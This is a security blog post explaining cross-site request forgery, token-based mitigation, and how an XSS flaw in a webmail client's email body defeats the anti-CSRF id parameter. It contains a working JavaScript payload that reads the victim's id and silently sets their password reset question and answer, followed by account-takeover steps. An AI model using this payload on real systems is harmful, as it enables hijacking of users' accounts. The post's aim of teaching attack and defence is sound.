Cross Site Request Forgery
Cross Site Request Forgery (CSRF) is an attack in which an attacker tricks a user's browser into performing actions of the attacker's choosing, with the added benefit (for the attacker) that the browser automatically attaches the user's authentication, typically the session cookie. The archetypal example: imagine that a bank customer who wants to transfer funds visits a specific URL such as http://bank.com/transfer.php?to=hacker_acct&amount=1000. All the attacker has to do is trick people into clicking a link to that URL, or embed it as an image source on a page they control, so that the victim's browser performs the GET; if the victim happens to be logged into that bank, the victim unknowingly transfers money to the attacker. The web application assumes the user is in full control of their own actions and executes the transfer. CSRF exploits the trust the web application places in the user's browser. You can read more about CSRF here.
CSRF Mitigation
The majority of CSRF mitigation strategies revolve around some sort of nonce being bound to the request. Instead of a static URL such as http://bank.com/transfer.php?to=hacker_acct&amount=1000, you would have something like http://bank.com/usersession-1234/transfer.php?to=hacker_acct&amount=1000, so that the attacker cannot generate a working link ahead of time. (A token in the URL is the weaker form of this: it can leak through the Referer header, browser history and server logs, which is why a hidden form field is the usual choice.) For a POST, the form carries a hidden field set to the nonce. That token is passed along when the user hits Submit, and the server checks that the nonce it issued for that form is the one that came back. The point is not that the nonce is secret from the user; it is that the value is unpredictable and that the attacker's page, sitting on a different origin, cannot read it out of the victim's page. An attacker is therefore unable to craft a static link or form to trick users with. Here is what a CSRF token looks like:
[Screenshot: a hidden form field carrying the CSRF token]
That token prevents us from hard-coding a POST to the URL, since its value should change every time the form is loaded, or at the very least once per session.
Mitigating CSRF Mitigations
With these tokens and nonces making the URL or parameters unique, CSRF should be pretty much resolved, since the attacker can no longer forge a valid request, right? Not quite. Let's review what XSS gives us. XSS lets an attacker run a script in the victim's browser, in the origin of the vulnerable application. The browser trusts that script as if it were the application's own and executes it, no questions asked. In particular, a script running in the application's origin can read the page, including the session identifier or CSRF token embedded in the URL or the form, which is exactly what the same-origin policy was keeping away from the attacker. So we use the XSS vulnerability to recover the specific session information or token, incorporate it into the CSRF request, and proceed as normal. This is why CSRF tokens are not a defence against XSS: once an attacker can run script in your origin, the token check is satisfied by definition.
Putting It All Together
Let's go back to a previous post. What we had there was an XSS vulnerability in the body of an email. With that in mind, let's look around the web application a little more to see what we can find. Within the Advanced Options, there is an option to configure the password reset question, the answer, and a checkbox to enable the feature at all.
Let's fill this out, hit Submit, and trap the request the browser makes with a Firefox plugin named Tamper Data, so we know what we have to replicate.
Here we see the POST that is made once we update these values and hit Save:
[Screenshot: the Tamper Data window for the Save request]
Tamper Data shows, on the right-hand side, all of the parameters being passed in the POST body. Of particular interest, enabling the password reset question corresponds to the usepassresetting parameter having the value checkbox, and you can also see the URL-encoded password reset question and password reset answer. The other parameters matter as well and will play a part later.
The other important thing to notice is that another parameter passed along is id, with the value 333n487v6y1sJjJ0GFnzPsID8oKJBfmEZeyk20140130002922. If you log in and out a few times you will see that this value changes, so it is probably random (the last fourteen characters, 20140130002922, read like a timestamp, so only the leading part is doing the work). I did not spend any time doing a statistical analysis with Burp to verify this, but I assumed it was. This id parameter is what stops us from hard-coding a POST to _processaccountoptions with usepassresetting set to checkbox and passresetanswer set to whatever we want. Fortunately, we can get around this thanks to the XSS vulnerability we have in our back pocket.
The flow of the attack goes as follows: the victim opens an email with JavaScript embedded in its body. That snippet loads a piece of JavaScript from the attacker's server that will:
- Parse out the value of the id parameter in the URL of the victim's browser
- Use that id parameter value and complete the POST request to set the victim's password reset question.
Now, we send the victim an email with this embedded in its body:
That loads this piece of JavaScript, hosted on the attacker's server:
This script first grabs the URL and parses out the value of the id parameter with a substring. Next, it calls the passwordReset function, which pieces together the parameters necessary to perform a proper POST to the _processaccountoptions URL. Notice that this sets usepassresetting, passresetquestions and passresetanswer.
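The original snippet is not reproduced in this copy of the post, so the following is an added reconstruction of the chain just described (my code, not the post's script and not the code that was in the email). It also illustrates the previous section's point, that script running in the application's origin can simply read the anti-CSRF value. The parameter names id, usepassresetting, passresetquestions and passresetanswer, the _processaccountoptions path and the question and answer strings are from the post; the URL layout, a regular expression in place of the post's substring, and the hidden-form submission are assumptions.

```javascript
// Added example: reconstruction of the XSS-to-CSRF chain described in the
// post, not the post's own script. Parameter names and the
// _processaccountoptions path come from the post; the URL layout, the regex
// and the hidden-form approach are assumptions.

// Pull the anti-CSRF "id" value out of the page URL, e.g.
// https://webmail.example/mail/?id=333n487...&folder=inbox  (constructed)
function extractId(url) {
  const m = /[?&]id=([^&#]*)/.exec(url);
  return m ? decodeURIComponent(m[1]) : null;
}

// Assemble exactly the parameter set the legitimate "Save" click sends, with
// the stolen id and attacker-chosen question and answer.
function buildResetParams(id, question, answer) {
  return {
    id: id,
    usepassresetting: "checkbox",
    passresetquestions: question,
    passresetanswer: answer,
  };
}

// application/x-www-form-urlencoded body, for a direct POST if preferred.
function encodeForm(params) {
  return Object.entries(params)
    .map(([k, v]) => encodeURIComponent(k) + "=" + encodeURIComponent(v))
    .join("&");
}

// In the victim's browser: build a hidden form and submit it. The browser
// attaches the victim's session cookie, and the id satisfies the token check.
// `doc` is passed in so the logic can be exercised without a real DOM.
function passwordReset(doc, action, params) {
  const form = doc.createElement("form");
  form.method = "POST";
  form.action = action;
  for (const [k, v] of Object.entries(params)) {
    const input = doc.createElement("input");
    input.type = "hidden";
    input.name = k;
    input.value = v;
    form.appendChild(input);
  }
  doc.body.appendChild(form);
  form.submit();
  return form;
}

// Entry point when loaded by the XSS payload in the email; skipped outside a
// browser so the functions above can be imported and tested elsewhere.
if (typeof window !== "undefined" && typeof document !== "undefined") {
  const id = extractId(window.location.href);
  if (id) {
    passwordReset(
      document,
      "/_processaccountoptions",
      buildResetParams(id, "Hacked via XSS", "h4cked")
    );
  }
}
```

The form submission is deliberately the same shape as the legitimate Save request: same path, same parameter names, same id, so from the server's side there is nothing to distinguish it from the user clicking the button.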
This should be enough to bypass the randomly generated id. If everything works, when the user opens the malicious email they unknowingly enable the password reset feature and set their password reset answer to whatever the attacker chose. The attacker can then set the user's password through the password reset feature.
Thus, once the user opens the email, the attacker can:
- Go to the webmail login screen and click the Forgot your password? link
- Enter the victim's email address
- Observe that the victim's password reset question is now what we set it to in our script, "Hacked via XSS"
- Enter the answer to the question, 'h4cked', and set a new password for the user. You could probably do steps 3 and 4 from the script as well, by extending it to make another CSRF POST, to save yourself the manual effort.
I hope this post helped describe what CSRF is, what it allows you to do, and just how powerful XSS can be: its impact can be much more than dumping cookies and throwing alert boxes.
I still cannot understand where I have to type these codes. It all seems very complicated to me. I would be very grateful if someone told me.